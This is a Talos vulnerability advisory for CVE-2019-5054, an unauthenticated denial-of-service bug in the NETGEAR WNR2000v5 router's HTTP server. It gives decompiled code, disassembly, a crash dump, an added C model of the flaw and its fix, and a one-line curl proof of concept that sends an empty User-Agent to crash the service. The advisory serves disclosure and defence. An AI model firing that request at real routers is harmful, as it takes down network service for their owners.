Talos Vulnerability Report

TALOS-2019-0831

NETGEAR N300 WNR2000v5 unauthenticated HTTP denial-of-service vulnerability

September 9, 2019
CVE Number

CVE-2019-5054

Summary

An exploitable denial-of-service vulnerability exists in the session handling functionality of the NETGEAR N300 (WNR2000v5) HTTP server. An HTTP request with an empty User-Agent string sent to a page requiring authentication can cause a null pointer dereference, resulting in the HTTP service crashing. An unauthenticated attacker can send a specially crafted HTTP request to trigger this vulnerability.

Tested Versions

NETGEAR N300 WNR2000v5 Firmware Version V1.0.0.70

Product URLs

https://www.netgear.com/support/product/WNR2000v5

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476: NULL Pointer Dereference

Details

The NETGEAR N300 is a small, affordable wireless router with minimal features.

Each HTTP request made to the HTTP daemon populates the following structure located at the hard-coded address 0x4cabb0:

struct http_request {
    char method[8];
    float version;
    char url[256];
    char headerbuf[4096];
    char *authorization;
    char *host;
    char *accept;
    char *accept_charset;
    char *accept_encoding;
    char *accept_language;
    char *connection;
    char *cookie;
    char *referer;
    char *user_agent;
    char *content_type;
    char *content_length;
    char *soapaction;
}

When attempting to connect to a page that requires authentication, the function do_auth_check() calls another function called send_authenticate(). This function contains a section of code that concatenates the received User-Agent to the end of the client IP address (after it is converted to a string). This string is then supposed to be compared against the contents of the file “/tmp/AUTH_login_browser”, which should contain the IP address and User-Agent of the previously authenticated client.

The problem arises when req->user_agent is never populated (the request carries an empty User-Agent header): there is no check for this case before the pointer is used. The result is a NULL pointer dereference that crashes the service:

agent = sa_straddr(&peeraddr); // Convert binary IP address to a string at 0x4b1c98
strcpy(curBrowser,agent);      // Copy string
strcat(curBrowser,req.user_agent); // Append req->user_agent to IP address

[Annotated Disassembly / Decompilation output]

0x4097f8 <send_authenticate+412>:	lw	a1,4400(s5)   // req->user_agent
0x4097fc <send_authenticate+416>:	lw	t9,-31484(gp) // load address of strcat()
0x409800 <send_authenticate+420>:	jalr	t9          // crash @ call strcat(curBrowser, agent)
0x409804 <send_authenticate+424>:	move	a0,s0       // client IP address string
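The flaw above and its fix, modelled as an added example in C (constructed for this write-up, not NETGEAR's or Talos's code; the function names, buffer sizes and the toy header lookup are assumptions): an empty User-Agent value leaves the field NULL, the unchecked strcpy/strcat pattern dereferences it, and a bounded, NULL-safe replacement treats a missing header as an empty string.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of the curBrowser construction described in the advisory
 * (hypothetical, not the router's code): "<client IP><User-Agent>", which is
 * later compared against /tmp/AUTH_login_browser. */

/* Vulnerable pattern: req->user_agent may be NULL when the client sends an
 * empty User-Agent, and strcat() dereferences it unconditionally (CWE-476). */
void build_browser_key_unsafe(char *out, const char *ip, const char *ua) {
    strcpy(out, ip);
    strcat(out, ua);             /* faults inside strcat when ua == NULL */
}

/* Hardened replacement: a missing User-Agent becomes "", the write is bounded,
 * and truncation is reported instead of silently producing a partial key.
 * Returns the key length, or -1 on error. */
int build_browser_key(char *out, size_t outlen, const char *ip, const char *ua) {
    if (out == NULL || outlen == 0 || ip == NULL)
        return -1;
    if (ua == NULL)              /* the check send_authenticate() lacks */
        ua = "";
    int n = snprintf(out, outlen, "%s%s", ip, ua);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return -1;               /* would not fit: refuse rather than truncate */
    }
    return n;
}

/* Toy header lookup mirroring how "User-Agent:" with an empty value ends up as
 * a NULL struct field: absent and empty values both yield NULL. Constructed for
 * illustration; input is a run of "Name: value\r\n" lines. */
const char *header_value(const char *headers, const char *name, char *buf, size_t buflen) {
    size_t nlen = strlen(name);
    const char *p = headers;
    while (p && *p) {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == ':') {
            const char *v = p + nlen + 1;
            while (*v == ' ') v++;
            size_t vlen = strcspn(v, "\r\n");
            if (vlen == 0 || vlen >= buflen) return NULL;   /* empty -> NULL */
            memcpy(buf, v, vlen); buf[vlen] = '\0';
            return buf;
        }
        p = strstr(p, "\n");
        if (p) p++;
    }
    return NULL;
}
```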

Crash Information

   0x2ab59f88:	bnez	v0,0x2ab59f84
   0x2ab59f8c:	addiu	v1,v1,1
   0x2ab59f90:	addiu	v1,v1,-2
=> 0x2ab59f94:	lb	v0,0(a1)        // $a1 == 0x00
   0x2ab59f98:	addiu	v1,v1,1
   0x2ab59f9c:	addiu	a1,a1,1
   0x2ab59fa0:	bnez	v0,0x2ab59f94
   0x2ab59fa4:	sb	v0,0(v1)

Stopped reason: SIGSEGV
0x2ab59f94 in ?? ()

peda-mips > x/32xw $a1
0x0:	Cannot access memory at address 0x0

Exploit Proof of Concept

$ curl -H 'User-Agent:' http://192.168.1.1/UPG_upgrade.htm

Timeline

2019-05-08 - Vendor Disclosure
2019-09-09 - Public Release

Credit

Discovered by Dave McDaniel of Cisco Talos.